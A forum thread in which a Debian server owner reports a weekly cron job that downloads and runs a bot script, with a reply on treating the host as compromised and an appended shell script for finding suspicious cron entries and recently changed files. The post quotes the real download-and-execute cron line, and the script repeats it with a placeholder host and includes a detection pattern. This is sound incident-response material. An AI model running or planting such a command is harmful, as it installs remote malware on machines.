suspected victim of Tsunami exploit
Since my server acted "weird" lately (pulling high bandwidth in spikes during my nighttime, then automatically stopping for the past few days), I inspected the server and found a crontab which pulled regular.bot from stablehost.us:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
A quick Google search led me to the following CentOS (I'm running Debian) forum page:
Looking through /tmp on my device, there are no scripts which don't belong as far as I can see:
root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt 6 root root 4.0K Jan 4 13:45 .
drwxr-xr-x 24 root root 4.0K Jan 4 05:14 ..
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .X11-unix
-rw-r--r-- 1 root root 0 Jan 4 13:16 .sh
drwxr-xr-x 2 root root 4.0K Dec 23 23:39 .webmin
Is anyone able to provide more info, with a means to make sure the system is clean?
I know the best course of action would be to scrap the server and start over. This is scheduled, but I don't currently have the time for it, so if I could make sure it's not a threat at this minute, I could build the new machine at the scheduled time.
Regards,
2 Replies
I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?
Search all your logs, command histories, etc. Search for all new files on your server and examine them to make sure they are not backdoors.
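A small triage script for the two things raised in this thread, the cron entry in the question and the "search for new files" advice in the reply. This is an added example, not code from the thread or from any project it mentions: the function names are mine, the Debian cron file locations are assumed, the sample crontab is constructed (the download URL in it is a placeholder, not the real one from the post), and the grep pattern flags entries for a human to review rather than deciding anything on its own.

```sh
#!/bin/sh
# Added example, not code from the thread. Triage helpers for the situation
# described above: a cron entry that downloads a script and runs it from /tmp.
# Assumes a Debian-style cron layout; the URL in the sample is a placeholder.

# Cron files worth reading on a Debian host (per-user crontabs included).
cron_sources() {
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /etc/cron.weekly/* /etc/cron.monthly/* /var/spool/cron/crontabs/*; do
        if [ -f "$f" ]; then printf '%s\n' "$f"; fi
    done
}

# Print (with line numbers) cron entries that fetch something over the network
# or touch a world-writable scratch directory. These are for review, not
# automatic verdicts: a backup job logging to /tmp matches too.
scan_cron_file() {
    grep -nE '(wget|curl|/tmp/|/var/tmp/|/dev/shm/)' "$1" 2>/dev/null
}

# Same pattern, but emit only the number of matching lines (0 when none).
count_suspicious_cron_lines() {
    grep -cE '(wget|curl|/tmp/|/var/tmp/|/dev/shm/)' "$1" 2>/dev/null || true
}

# Files whose inode changed in the last N days under a tree. ctime is used
# rather than mtime because an intruder can reset mtime with touch(1);
# forging ctime needs clock manipulation or raw disk access.
recently_changed() {
    # $1 = directory, $2 = days
    find "$1" -xdev -type f -ctime "-$2" -print 2>/dev/null || true
}

# Write a constructed sample user crontab (not a real capture) to the given
# path: one ordinary entry, one benign job that logs to /tmp, and one
# download-and-run entry shaped like the one in the question.
write_sample_crontab() {
    cat > "$1" <<'EOF'
17 * * * * cd / && run-parts --report /etc/cron.hourly
0 3 * * * /usr/local/bin/backup.sh > /tmp/backup.log
@weekly wget http://malware.example.invalid/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
EOF
}

# Demonstration on the constructed sample; on a real host, loop over
# cron_sources instead and feed each file to scan_cron_file.
demo() {
    d=$(mktemp -d)
    write_sample_crontab "$d/crontab.sample"
    echo "Entries to review in $d/crontab.sample:"
    scan_cron_file "$d/crontab.sample"
    echo "Count: $(count_suspicious_cron_lines "$d/crontab.sample")"
    rm -rf "$d"
}

demo
```

On the real host, `for f in $(cron_sources); do scan_cron_file "$f"; done` covers the system and per-user cron files, and `recently_changed / 14` lists files whose inode changed in the last two weeks (compare against package manager manifests to separate updates from drops). The zero-byte `/tmp/.sh` in the listing above would not be found by a name-based search at all, which is why a time-based sweep is the more useful one.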